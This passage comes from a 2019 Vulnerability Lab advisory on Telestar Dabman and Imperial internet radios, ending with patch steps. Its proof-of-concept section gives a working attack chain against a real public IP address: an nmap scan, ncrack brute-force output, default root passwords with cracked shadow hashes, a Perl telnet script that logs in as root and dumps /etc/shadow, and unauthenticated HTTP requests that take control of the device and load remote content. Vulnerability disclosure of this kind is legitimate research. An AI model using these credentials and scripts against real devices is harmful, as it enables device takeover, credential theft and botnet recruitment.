manual password bruteforce technics or by basic automated attacks with scripts (exp. ncrack). After receiving the password the remote or local network attacker can unauthorized login to the internet radio device to use the embedded linux busybox operating system. After the attacker has been logged in as root user, he can open the /etc/ path to cat gshadow, shadow and the conf files. At the end the attacker has finally full root access on the busybox (telnetd), he can access the web-server (httpd) as admin and see the wireless lan + unencrypted key in ./flash/ - wifi.cfg. A demo exploit poc is available in the wild. Due to some deeper researcher we identified also another manufacturer that uses the same typ of default manufactured system. The same undocumented telnet service was uncovered during the analysis. The manufacturer is still processing a patch. Vulnerable Protocol(s): \[+\] telnetd System(s): \[+\] BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash) (Debian Linux PreRelease - ARM 3.3.2) Firmware Version(s): \[+\] TN81HH96-g102h-g102 Manufacturer: Telestar Digital Gmbh Affected Version(s): \[+\] Bobs Rock Radio \[+\] Dabman D10 \[+\] Dabman i30 Stereo \[+\] Imperial i110 \[+\] Imperial i150 \[+\] Imperial i200 \[+\] Imperial i200-cd \[+\] Imperial i400 \[+\] Imperial i450 \[+\] Imperial i500-bt \[+\] Imperial i600 1.2 The dabman and imperial manufactured web radio series (typ d & i) suffers from a command execution vulnerability. The vulnerability allows local and remote attackers unauthorized and unauthenticated send commands to comprimise the web radio devices. The vulnerability is located httpd web-server communcation on port 80 and 8080. Local and remote attackers can send basic GET commands with basic command line tools (exp. curl or modhttp) to modify or manipulate http requests. The attacker can also capture the http airmusic commands to reverse engineer the radio device for unauthorized interactions. The system has no protection mechanism to block unauthorized transmit of commands. The web radio as well not owns an auth or reminder mechanism to ensure only allowed or trusted sources can transmit the commands (client, system, mac , auth ...). Vulnerable Protocol(s): \[+\] httpd Module(s): \[+\] UIData (Web UI on 80 or 8080) Function(s): \[+\] /set\_dname \[+\] /mylogo \[+\] /LocalPlay \[+\] /LocalPlay \[+\] /irdevice.xml \[+\] /Sendkey \[+\] /setvol \[+\] /hotkeylist \[+\] /init \[+\] /playlogo.jpg \[+\] /stop \[+\] /exit \[+\] /back \[+\] /playinfo Parameter(s): \[+\] ?name= \[+\] ?url=./\*.jpg \[+\] ?url=/stream.wav&name=\* \[+\] ?url=/msg.wav&save=\* \[+\] ?key=\* \[+\] ?vol=\*0&mute=\* \[+\] ?language=\* Affected Function(s): \[+\] Air Music Controls Manufacturer: Telestar Digital Gmbh Affected Version(s): \[+\] Bobs Rock Radio \[+\] Dabman D10 \[+\] Dabman i30 Stereo \[+\] Imperial i110 \[+\] Imperial i150 \[+\] Imperial i200 \[+\] Imperial i200-cd \[+\] Imperial i400 \[+\] Imperial i450 \[+\] Imperial i500-bt \[+\] Imperial i600 Proof of Concept (PoC): ======================= 1.1 Undocumented Telnet Service (telnetd) The security vulnerability can be exploited by local and remote attackers without user interaction or privileged user account. For security demonstration or to reproduce follow the provided information and steps below to continue. Nmap Portscan Scanning R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) \[1000 ports\] Discovered open port 8080/tcp on 93.234.141.215 Discovered open port 80/tcp on 93.234.141.215 Discovered open port 23/tcp on 93.234.141.215 Completed SYN Stealth Scan at 14:48, 13.38s elapsed (1000 total ports) Initiating Service scan at 14:48 Scanning 3 services on R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) Completed Service scan at 14:48, 6.20s elapsed (3 services on 1 host) Initiating OS detection (try #1) against R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) NSE: Script scanning 93.234.141.215. Initiating NSE at 14:48 Completed NSE at 14:49, 30.61s elapsed Initiating NSE at 14:49 Completed NSE at 14:49, 0.00s elapsed Nmap scan report for R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) Host is up (0.010s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 23/tcp open telnet security DVR telnetd (many brands) 80/tcp open tcpwrapped |\_http-title: AirMusic 8080/tcp open http BusyBox httpd 1.13 | http-methods: |\_ Supported Methods: GET |\_http-title: 404 Not Found MAC Address: 7C:C7:09:FD:3B:56 (Shenzhen Rf-link Technology) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux\_kernel:2.6 OS details: Linux 2.6.16 - 2.6.35 (embedded) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=197 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux\_kernel NCrack \[telnetd\] (ncrack -v --user root \[IP\]:\[PORT\]) C:Program Files (x86)Ncrack>ncrack -v --user root 93.234.141.215:23 Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-06-29 18:21 Mitteleuropõische Sommerzeit Discovered credentials on telnet://93.234.141.215:23 'root' 'password' Discovered credentials on telnet://93.234.141.215:23 'root' 'password1' Discovered credentials on telnet://93.234.141.215:23 'root' 'password2' Discovered credentials on telnet://93.234.141.215:23 'root' 'password123' Discovered credentials on telnet://93.234.141.215:23 'root' 'password12' Discovered credentials on telnet://93.234.141.215:23 'root' 'password3' Discovered credentials on telnet://93.234.141.215:23 'root' 'password!' telnet://93.234.141.215:23 finished. Too many failed attemps. Discovered credentials for telnet on 93.234.141.215 23/tcp: 93.234.141.215 23/tcp telnet: 'root' 'password' 93.234.141.215 23/tcp telnet: 'root' 'password1' 93.234.141.215 23/tcp telnet: 'root' 'password2' 93.234.141.215 23/tcp telnet: 'root' 'password123' 93.234.141.215 23/tcp telnet: 'root' 'password12' 93.234.141.215 23/tcp telnet: 'root' 'password3' 93.234.141.215 23/tcp telnet: 'root' 'password!' Ncrack done: 1 service scanned in 273.29 seconds. Probes sent: 1117 | timed-out: 50 | prematurely-closed: 117 Ncrack finished. System: BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash) Kernel: 9)20151217\_M8\_TFT\_7601\_Kernel OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian prerelease)Aaeabi.shstrtab.init.text.fini. rodata.ARM.extab.ARM.exidx.eh\_frame.init\_array. fini\_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes Built-in commands: . : \[ \[\[ bg break cd chdir continue echo eval exec exit export false fg hash help jobs kill local printf pwd read readonly return set shift source test times trap true type ulimit umask unset wait Currently defined functions: \[, \[\[, ash, cat, chmod, cp, date, df, echo, free, ftpget, ftpput, gunzip, httpd, ifconfig, init, insmod, kill, killall, linuxrc, login, ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod, route, run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc, udhcpd, umount, unlzma, usleep, zcat Username: root Password: password & password! shadow root:r.BF8RVw56BOA:1:0:99999:7::: (decrypted: password & mldonkey) ftp:!:0:::::: (decrypted: empty/blank) usb:w.rW11jv2dmM2:13941:::::: (decrypted: winbond) gshadow root:::root,mldonkey PoC: Exploit use Net::Telnet (); use Cwd; $file="inputLog.txt"; $ofile="outputlog.txt"; # For local network change to localhost or local ip @hosts = ("93.234.141.215"); foreach $hostip (sort @hosts) { $t = new Net::Telnet (Timeout => 10, Input\_log => $file, Prompt => "/>/"); print "nnConnecting to undocumented Telnet Service of Imperial or Dabman Web Radio Service: $hostip ...n"; print "nnAffected Models: Bobs Rock Radio, D10, i30, D30iS, i110, i150, i200, i200-cd, i400, i450, i500-bt, i600n"; $t->open("$hostip"); $t->login("root","password"); my @lines = $t->cmd('cat /etc/shadow'); print "$hostip: Directories:n"; print "@lines n"; $t->close; } 1.2 AirMusic Unauthenticated Command Execution (httpd) The security vulnerability can be exploited by local and remote attackers without user interaction or privileged user account. For security demonstration or to reproduce follow the provided information and steps below to continue. AirMusic Status Interface: http://93.234.141.215:80 Web-Server HTTPD UIData Path: http://93.234.141.215:8080 Note: Attacks can be performed in the local network (Localhost:80) or remotly by requesting the url remote ip adress (93.234.141.215) + forwarded remote port(Standard :23). Get device name from Device http://93.234.141.215:80/irdevice.xml Set device name http://93.234.141.215:80/set\_dname?name=PWND Set boot-logo (HTTP URL, requirement: JPG) http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg Display or retrieve channel logo http://93.234.141.215:80:8080/playlogo.jpg Changing the main menu with the selected language http://93.234.141.215:80/init?language=us Play stream http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME Save audio file as message http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1 Recall channel hotkeys http://93.234.141.215:80/hotkeylist Current playback data http://93.234.141.215:80/playinfo Set volume from 0-31 & mute function http://93.234.141.215:80/setvol?vol=10&mute=0 Reset http://93.234.141.215:80/back Set stop http://93.234.141.215:80/stop Activate all back http://93.234.141.215:80/exit Send keystroke combo http://93.234.141.215:80/Sendkey?key=3 PoC: Exploit Dabman & Imerpial - HTML AutoPwner PoC: Checker for Modifications #!/usr/bin/perl use strict; use warnings; use LWP::Simple; my $url1 = 'http://93.234.141.215:80/'; my $source1 = get( $url1 ); my $url2 = 'http://93.234.141.215:80/'; my $source2 = get( $url2 ); print $source1; print $source1; Solution - Fix & Patch: ======================= A fresh updated version is available by the manufacturer telestar digital gmbh to resolve the vulnerabilities in all i & d series products. It is recommended to install the updates as quick as possible to ensure the digital security. Manual steps to update: 1. Set the device to the factory setting 2. Select language 3. Switch off the device 4. Switch on the device 5. Network setup 6. Wait for "New Software" message 7. Press OK to start the update 8. Updated Version: TN81HH96-g102h-g103\*\*a\*-fb21a-3624 Security Risk: ============== The security risk of the vulnerabilities in the online web radio with wifi and user interface are estimated as critical. The vulnerability can be exploited by local attackers in a network or by remote attackers without user interaction or further privileged user accounts. The potential of the issue being exploited in thousends of end user devices all over europe is estimated as high. The issue has the potential that could be used by remote attackers for spreading randomware / malware, mass defacements, compromises for further linux network attacks or being part of a criminal acting iot botnet. Credits & Authors: ================== Benjamin K.M. \[VULNERABILITY LAB - CORE RESEARCH TEAM\] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln\_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss\_upcoming.php vulnerability-lab.com/rss/rss\_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2019 | Vulnerability Laboratory - \[Evolution Security GmbH\]™

Tag

#php